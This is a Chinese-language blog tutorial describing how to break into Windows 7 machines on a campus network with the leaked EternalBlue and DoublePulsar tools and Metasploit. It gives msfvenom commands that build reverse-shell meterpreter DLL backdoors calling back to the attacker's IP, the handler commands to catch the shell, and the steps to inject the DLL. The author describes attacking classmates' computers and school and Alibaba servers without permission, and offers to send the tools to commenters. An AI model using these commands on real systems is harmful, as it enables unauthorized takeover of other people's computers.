正在阅读:

FB+Metasploit入侵win7实例

引言

前几天影子经纪人Shadow Brokers黑了方程式黑客组织(网上是这么说的),然后放出了一堆牛逼的工具,这好像向互联网世界投放了一枚核弹,这一堆工具可以主要用来攻击windows系统,主要针对windows xp/7/2008 操作系统,然而现在很多服务仍然使用的是windows系统,这将导致全世界的70%服务器暴露在危险之中,工具发布出来的那一刻,整个互联网都炸了锅,自从之前臭名昭著的MS08-067漏洞之后,这次的漏洞是最大的一个,并且绝不亚于MS08-067,我前几天亲自测试了window server2008和windows7,大部分的机器都是一打一个准,几分钟就能拿到服务器的管理员权限。

再说一下windows7,它几乎是不用来做服务器的,一般都是个人电脑,虽然windows 8和10都已经出来了,但是我个人认为i,win7比后面这两个版本要好用,但不巧,这一堆工具发出来之后,几乎所有的win7都可以轻松被入侵,别人可以轻而易举的监视你的一举一动。

测试环境

攻击机1:windows 7   IP:10.216.50.193

攻击机2:Kali (Ubuntu系统)  IP:10.217.101.17

被攻击者:内网的某台windows7(校园网内网可ping通)

攻击工具

Metasploit (用来生成dll和控制被攻击者)

FB (用来攻击被攻击者漏洞)

LanHelper (扫描内网主机)

开启渗透之旅

1、扫描IP 找到入侵对象

我么首先在我们使用LanHelper在所在的网段扫描一批机器出来

2

    如上图,我们已经扫描完一批内网机器,这里要注意一下我们要拿来测试的是win7系统的机器,一般win7系统扫完之后在后面都有WORKGROUP的标志,我们就拿上面的10.216.42.7这个ip下手吧。

被攻击者IP:10.216.42.7

2、和使用fb工具进行攻击测试

    我们首先在fb.py目录下么新建一个listeningposts文件夹,如果没有它工具会报错。还有这个工具需要电脑居右python2.6和pywin32环境,否则是无法运行的。

    打开fb.py,然后进行一系列的配置,填上被攻击者ip和本机ip,在询问是否重定向的地方输入no,因为我们不需要。


3

    后面紧接着 的是让输入记录的保存地址,自己输入一个路径然后回车,接着选择新建一个项目,然后输入文件名回车,然后输入 use Enternalblue

8

    然后一直回车,一直到提示选择操作系统的地方,然后选择1,回车后选择fb,也就是1

5

    到这位置,基本的配置算是完成了,下面一直按回车就好了,一直到下面的位置,然后输入yes或者直接确定

6

回车之后就开始进行攻击了,如果成功了就会出现以下界面

7

3、使用Metasploit生成dll后门文件并监听连接

    我们首先在kali上面ping一下被攻击者确定可以连接到。。。。我嘞个去,那家伙关机了,ping不通了,我换一个ip:10.216.29.127,上面的操作步骤换下ip就好

被攻击者ip:10.216.29.127

    ok,这次可以ping通了。我们在kali的终端使用命令生成一个dll后门文件,命令如下

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.217.101.17  LPORT=5555 -f dll > /opt/my.dll

上面的LHOST=后面填你的kali的ip,LPORT=是我们要监听的端口,生成的文件放在了 /opt/下面。

s1

    然后将生成的文件拿到window7攻击机的c盘下面,然后启动kali的Metasploit,启动命令是msfconsole,然后一次执行下面的命令


1
2
3
4
5
use exploit/multi/handler
set lhost 10.217.101.17
set lport 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

s2

这样就开始监听5555端口,等待被攻击者的连接。下面继续使用win7攻击机,将刚才生成的dll注入到被攻击者。

4、使用fb的Doublepulsar注入dll

在fb中继续输入命令 use Doublepulsar 然后一直回车知道选择攻击类型和选择目标机位数,选择SMB和x64,如下

s3

    然后回车再选择2,注入dll文件,输入刚才的dll文件路径c:\my.dll。

s5

    然后一直回车,知道最后输入yes的运行的命令

s6

    当看到上面的Succeeded的提示的时候,说明已经注入成功了,这时候可以去kali端查看连接情况了。

5、kali攻击机控制被攻击者

看kali端的l连接情况

s4

从上面可以看到,被攻击者主动连接了攻击机,此时的kaili攻击机就拿到了控制被攻击者的权限。具体的执行命令这里就不说了,因为我们入侵的是windows7,这里其实已经是管理员权限了,不用再继续提权了。
6、补充

上面的生成的dll文件是64位的,所以在攻击32位的机器的时候是会注入失败的,不过不要紧,只要取消生成命令的时候的x64就可以了,这时候在监听端口的时候也需要监听32位的反弹连接,同样在设置pyload的时候去掉x64就可以了。命令如下


1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.217.101.17 LPORT=5555 -f dll > /opt/s.dll

1
2
3
4
5
use exploit/multi/handler
set lhost 192.168.1.106
set lport 5555
set PAYLOAD windows/meterpreter/reverse_tcp
exploit

结束语

经过我的多次测试,学校的一些windows2008服务器也存在这种漏洞,并且和容易被渗透进去,阿里的服务器也是,扫了一段2008出来,测试也成功拿到管理员权限,所以说,这款工具简直就是windows的克星、好在微软的补丁已经出来了,使用windows7和2008,2003的小伙伴们赶紧打补丁吧,要不然,你可能会在某一时刻和别人一起看不可描述的小电影。

为本次被我作为攻击者的同学道歉,放心,我并没有做坏事,刚连着上之后就掉线了,因为已经半夜12点了,都特么睡觉了。。

本教程中所使用的工具你们可以自己去网上找,实在账号不到的话,在下面留言、留下你的联系方式,我发给你。千万不要去做坏事哦。

最后抱怨一句,这个wordpress破编辑器真的很难用,你们不懂哥的痛。

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌